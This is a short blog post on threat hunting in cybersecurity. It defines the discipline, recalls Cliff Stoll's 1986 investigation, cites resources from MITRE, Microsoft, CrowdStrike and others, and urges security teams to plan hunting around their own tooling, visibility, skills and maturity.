Threat Hunting in 2023 — What Matters Most to You and Your Teams?

4 min readAug 29, 2023

Bit of Background on Threat Hunting

Today I would like to discuss threat hunting. To begin with, I would like to acknowledge that threat hunting is as old as modern computing and internetworking. We can look back to classic examples of threat hunting — and perhaps one of the earliest and best known, the story of Cliff Stoll’s adventures in computers and interconnected resources at Lawrence Berkley National Laboratory (LBNL) back in 1986. For more information on Cliff, his adventures in threat hunting, adversarial attribution, and international intrigue & espionage, I’d encourage you to check out his book The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage[i]. And I am sure that if we looked even more deeply in time past, we would find other examples of comparable exploitation and compromise that had been ferreted out (and perhaps classified) as matters of national security.

So, to begin with I think it would be appropriate to provide a quick definition of what threat hunting is for those who may not be familiar with it as a form of discipline related to many other forms of discipline in the cybersecurity industry. Very simply, threat hunting can be thought of as the practice or discipline of “hunting” (querying, searching, looking for) proactively for threats and adversarial threat actors, that may be attempting to compromise your organizations’ assets (assets here including people, systems, data and intellectual property, finances, networks — on premises, cloud, and hybrid, remote worker etc.,) or have already successfully done so via exploitation and compromise efforts (attacks, operations, campaigns etc.), thus establishing a well-defined series of footholds (ingress and egress points) allowing for unfettered access to your organization and environment. Put another way — potentially much more simply, threat hunting is the active exercise of looking for those things that are associated with known and unknown threats and actors that may be or are definitively targeting your organization and its assets. It is adjacent to and very much a part of the threat research and intelligence discipline (threat researchers and intelligence analysts really cannot be good at what they do if they do not have an ongoing development and mastery of hunting). However, it is often found (as an applied discipline and functional responsibility) in organizations outside of cyber threat intelligence (CTI) teams featuring prominently in mature SOCs and Incident Response organizations.

Several organizations and individuals through the years have written much about the subject of threat hunting and offer interesting, and at times, unique interpretations and opinions on what threat hunting is and what ought to be considered and put into practice. Organizations including the MITRE Corporation[ii], Microsoft[iii], Sqrrl (now Amazon)[iv][v], CrowdStrike[vi], ThreatConnect[vii] [viii](to name a few), and SOCPrime [ix]have written extensively on this topic as have many author teams on topics related to models (e.g., The Diamond Model[x], The Pyramid of Pain[xi], and many more!) useful in threat hunting and research of all types pertaining to advanced threats and the adversarial actors responsible for them.

What Matters Most to You and Your Team?

This is where threat hunting becomes personal to one extent or another. You, your colleagues, and your leadership need to establish what matters most to you to conduct the best and most comprehensive hunting in your environment, against all your assets. Naturally, having access to any/all tooling and feature set capabilities that fully facilitate the defender’s approach to living off the land is critical. Additionally, having access to well instrumented network segments yielding full packet capture and meta data derived from NSEW visibility, along with logs collected from hosts of all types (e.g., mobile devices — hard but not impossible, endpoints — laptops, desktops, servers, internetworking kit — including virtual appliances and cloud-based capabilities), will be crucial. All of this, in concert with well curated, high-quality threat intelligence and logic, along with backend supporting systems will not doubt play a key role in your organization’s approach to threat hunting and all things related to it (.e.g., incident response, forensics etc.). Furthermore, you will need to take into consideration your organizations’ maturity in addition to skillset and experience that your team has at its disposal in planning its approach toward long-term threat hunting success.

Closing Thoughts

In the end, though there are many different interpretations of threat hunting and the best ways to go about conducting it, there really is no one size fits all. Every organization is unique and has its own strengths and weaknesses despite commonalities that may be present among those organizations that find themselves members of one or more industry vertical. Threat hunting is best approached from an informed perspective with the understanding being that execution will — more likely than not require a tailored approach where the organizations tooling, monitoring and collections capabilities, maturity in program process, procedure, personnel skillset all must be considered and accounted for. And, lastly, despite all that should and/or must be considered there is no better time to begin if you have not already than the present. Proactive approaches in threat hunting are the most successful and many involve more than a little trial and error. Do not be put off by the nature of experimentation in honing skillset and expertise in threat hunting. Remember: Rome was not built in a day, and neither was any threat hunting program worth its salt. Happy hunting!

[i] https://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/1416507787

[ii] https://www.mitre.org/sites/default/files/2021-11/prs-19-3892-ttp-based-hunting.pdf

[iii] https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE5aC6y?culture=en-us&country=US

[iv] https://www.threathunting.net/files/hunt-evil-practical-guide-threat-hunting.pdf

[v] https://www.threathunting.net/files/huntpedia.pdf

[vi] https://www.crowdstrike.com/cybersecurity-101/threat-hunting/

[vii] https://threatconnect.com/blog/soar-reactive-threat-hunting-part-1/

[viii] https://threatconnect.com/blog/tactical-threat-hunting-what-is-it-and-how-do-you-start/

[ix] https://socprime.com/blog/what-is-cyber-threat-hunting/

[x] https://apps.dtic.mil/sti/pdfs/ADA586960.pdf

[xi] https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html